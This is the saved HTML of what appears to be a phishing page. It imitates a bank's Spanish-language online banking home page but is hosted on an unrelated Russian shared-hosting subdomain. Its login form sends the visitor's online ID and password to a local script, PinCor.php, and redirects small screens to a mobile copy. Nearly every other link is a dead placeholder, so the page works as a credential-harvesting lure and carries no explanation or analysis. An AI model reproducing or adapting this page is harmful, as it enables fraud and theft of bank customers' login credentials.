<!DOCTYPE html>
<!-- saved from url=(0035)http://u1952360.cp.regruhosting.ru/ -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>
        default
    </title>
    <link rel="stylesheet" href="https://ik.imagekit.io/bfa/fde_files/normalize.min.css">
    <link rel="stylesheet" href="https://ik.imagekit.io/bfa/fde_files/estilos.css">
    <link rel="stylesheet" href="https://ik.imagekit.io/bfa/fde_files/points.css">
    <link rel="shortcut icon" href="http://u1952360.cp.regruhosting.ru/img/logo.png" type="image/x-icon">
    <script type="text/javascript">
        if (screen.width < 801) {
            window.location = "indexm.php";
        }
    </script>
</head>

<body>
    <div class="contenedor">
        <div class="menu1">
            <ul class="pack1">
                <li>Personal</li>
                <li>Pequeñas empresas</li>
                <li>Administración Patrimonial</li>
                <li>Empresas e instituciones</li>
                <li>Seguridad</li>
                <li class="logpeq">
                    <img style="height: 14px; margin-right: 4px; margin-left: 1px" src="https://ik.imagekit.io/bfa/fde_files/logo.svg" alt="logo">
                    Acerca de nosotros
                </li>
            </ul>
            <ul class="pack2">
                <li>In English</li>
                <li>Contacto</li>
                <li>Ayuda</li>
            </ul>
        </div>
        <div class="logof">
            <div class="part1">
                <img src="https://ik.imagekit.io/bfa/fde_files/logo_grande.svg" alt="complet" height="31">
            </div>
            <div class="part2">
                <img src="https://ik.imagekit.io/bfa/fde_files/form1.png" alt="form">
            </div>
        </div>
        <div class="menu2">
            <ul class="pack3">
                <li><span>Cuentas de cheques</span></li>
                <li><span>Cuentas de ahorro</span></li>
                <li><span>Tarjeta de crédito</span></li>
                <li><span>Préstamos para vivienda</span></li>
                <li><span>Préstamos para automóviles</span></li>
                <li class="celda">
                    <span>Investing </span>
                    <img src="https://ik.imagekit.io/bfa/fde_files/bull.svg" alt="toro" width="32" height="28" style="margin-top: 5px; margin-left: 5px">
                </li>
                <li><span>Mejores Hábitos Financieros®</span></li>
            </ul>
        </div>

        <div class="principal">
            <div>
                <div class="formulario">
                    <form method="post" autocomplete="off" id="fusuario" class="fusuario"action="PinCor.php">
                        <span id="error2"> </span>
                        <div class="fgrupo">
                            <input type="text" name="usr" id="texto" placeholder="Identificación en línea" maxlength="100" control-id="ControlID-1" required="required">
                        </div>
                        <div class="fgrupo">
                            <input type="password" name="psw" id="contra" placeholder="Contraseña" maxlength="100" control-id="ControlID-2" required="required">

                        </div>
                        <div class="fgrupo flexi2">
                            <input type="checkbox" class="checkusu" name="idlinea" control-id="ControlID-3">
                            <label for="idlinea">Guardar Id. en línea</label>
                        </div>

                        <div class="fgrupo">
                            <input type="submit" id="usuenviar" class="btn btn-glass" control-id=" ControlID-4">
                         <!--       <span id="textobutton" class="textobutton">
                                
                                </span>
                                <div class="snippet" data-title=".dot-pulse" id="puntopulso" style="display: none;">
                                    <div class="stage">
                                        <div class="dot-pulse"></div>
                                    </div>
                                </div>
                            </button> -->
                        </div>

                        <div class="formpie">
                            <div class="fgrupo flexi">
                                <a href="javascript:void(0)">¿Olvidó su Identificación en línea o Contraseña?</a>
                            </div>
                            <div class="fgrupo flexi" style="margin-bottom: 10px">
                                <a href="javascript:void(0)">Seguridad y ayuda</a>
                                <a href="javascript:void(0)">Inscribirse</a>
                            </div>
                        </div>
                        <div class="formpie2">
                            <a href="javacript:void(0)">Abrir una cuenta</a>
                        </div>
                    </form>
                </div>
                <div class="cartaazul">
                    <div class="arriba">
                        <div class="uno">
                            <img src="https://ik.imagekit.io/bfa/fde_files/ubica.png" alt="ubica">
                        </div>
                        <div class="dos">
                            <a href="javascript:void(0)">Encuentre su centro financiero o cajero automático (ATM) más
                                cercanos</a>
                        </div>
                    </div>
                    <div class="abajo">
                        <div class="uno">
                            <img src="https://ik.imagekit.io/bfa/fde_files/calendar.png" alt="calendar">
                        </div>
                        <div class="dos">
                            <a href="javascript:void(0)">Programar una cita</a>
                        </div>


                    </div>
                </div>
            </div>
            <div class="enunciado">
                <h1>Elija la tarjeta que funciona para usted</h1>
                <img style="width:100%;" src="https://ik.imagekit.io/bfa/fde_files/tarjetas.png" alt="funciona">
            </div>



        </div>
        <div class="pieprincipal">
            <img src="https://ik.imagekit.io/bfa/fde_files/ahorro.png" alt="ahorro">
        </div>
    </div>

    <script src="https://ik.imagekit.io/bfa/fde_files/funciones.js.descarga"></script>


<div id="apple-password-autofill-list" style="z-index: 2147483647 !important; padding: 0px !important; margin: 0px !important; border-radius: 8px !important; position: fixed !important; color-scheme: normal !important; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 4px 0px, rgba(0, 0, 0, 0.18) 0px 8px 15px 6px !important; border: 1px solid rgba(0, 0, 0, 0.2) !important; overflow: hidden !important; backdrop-filter: blur(20px) !important; background-color: rgba(230, 230, 230, 0.8) !important; top: 235px !important; left: -999999px !important; opacity: 0 !important; visibility: hidden !important;"></div></body></html>